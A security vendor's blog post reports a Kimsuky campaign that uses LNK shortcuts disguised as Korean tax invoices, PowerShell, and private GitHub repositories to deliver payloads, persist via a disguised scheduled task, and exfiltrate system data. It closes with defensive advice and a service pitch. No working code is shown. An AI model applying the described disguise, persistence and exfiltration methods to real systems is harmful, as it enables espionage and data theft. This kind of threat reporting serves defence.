North Korean Hackers Use GitHub to Spread LNK Malware

The North Korea-linked hacking group Kimsuky has stepped up its cyber operations. They are now using GitHub repositories as a platform to distribute malware and exfiltrate sensitive data—a sophisticated evolution in their tactics.

They’re leveraging malicious LNK files (Windows shortcuts) disguised as electronic invoices. What looks like a simple PDF file is actually the first step in a full-blown attack chain that can compromise your device.

At TecnetOne, we’ve analyzed this campaign because it exemplifies how cybercriminals exploit legitimate infrastructure to bypass security controls and maintain persistent access to compromised systems.

How the Attack Starts

It begins with a ZIP file containing a shortcut file with an appealing name, such as:

전자세금계산서.pdf.lnk

(This means "electronic tax invoice" in Korean.)

Opening this LNK file triggers a PowerShell command that downloads and runs additional scripts hosted on private GitHub repositories controlled by the attackers.

That initial payload establishes the foundation for:

1. Systematic data collection

1. Long-term persistence on the victim’s machine

Using GitHub as a Malware Hub

Researchers at S2W discovered at least nine private repositories linked to this campaign, with names like group_0717, hometax, and group_0803.

Shockingly, the attackers included GitHub personal access tokens directly in their PowerShell scripts. This gave them secure, structured access to their repositories—highlighting a high level of operational planning.

Even the commit history revealed email addresses tied to the campaign, such as:

sahiwalsuzuki4[@]gmail.com

Related titles: How to Detect and Remove Spyware Apps on Android

Advanced Persistence

Once a device is infected, the malware runs a script named main.ps1, which creates another file in the %AppData% folder called:

MicrosoftEdgeUpdate.ps1

Then, it sets up an automated task called:

BitLocker MDM policy Refresh

This task runs every 30 minutes after a 5-minute delay. Its goal: continuously download and run new scripts from GitHub, ensuring the attackers retain access—even if passwords are changed or sessions are closed.

Dynamic Script Management and Data Theft

The malware features a dynamic system to manage scripts and organize stolen data:

1. It downloads a file called real.txt from GitHub

1. Replaces dummy values with unique timestamped identifiers, like ntxBill_{MMdd_HHmm}

1. Reuploads the modified file into organized folders by date and time

This process allows attackers to track each infection, manage multiple compromised systems, and build a detailed intelligence archive.

What Data Is Being Stolen?

The spyware component collects virtually everything it can find:

1. IP address

1. System boot times

1. OS version

1. Hardware specs

1. Device type

1. OS install date

1. Active processes

All of this is logged and uploaded back to the attackers’ repositories—creating a “control panel” of infected systems.

Why This Attack Is So Dangerous

This campaign raises major red flags for several reasons:

1. Use of legitimate infrastructure: GitHub is trusted, so connections often go unnoticed by security tools.

1. Self-updating persistence: The malware evolves constantly, keeping the door open.

1. Organized data exfiltration: Every infection is recorded precisely—making the information highly valuable for espionage or targeted attacks.

For attackers, this model is scalable and stealthy. For organizations, it’s a serious risk of prolonged, silent data breaches.

Read more: New Wiper-Type Malware for Linux in Go Modules on GitHub

Lessons for You and Your Business

At TecnetOne, we emphasize that the biggest threat is not just the sophistication of attackers—but our own lack of preparation.

Here’s how to respond:

1. Train your team: Many attacks start with a simple ZIP file or disguised link.

1. Monitor PowerShell usage: A legit tool often used for malicious purposes.

1. Implement behavior-based security: Malware can hide itself, but its activity is detectable with the right tools.

1. Control application execution: Restrict unsigned scripts and unknown shortcuts.

1. Have an incident response plan: If a device is compromised, isolate it and act fast.

The Role of Strategic Partners

Basic antivirus is not enough. At TecnetOne, we work with leading cybersecurity vendors to offer:

1. Advanced endpoint detection using behavior analytics

1. Secure data backups with rapid recovery

1. Red Team simulations to identify weaknesses before attackers do

1. 24/7 incident response to contain and remediate threats quickly

Conclusion: This Threat Cannot Be Ignored

The Kimsuky campaign shows how state-backed hackers are refining their methods to evade defenses and maintain access to critical systems.

Using GitHub as a malware distribution platform is a clear example of attackers abusing trusted infrastructure to fly under the radar.

Cybersecurity is no longer optional. You need a mix of prevention, detection, and fast response. At TecnetOne, we’re ready to help you strengthen your strategy—because every minute counts when stopping an attack.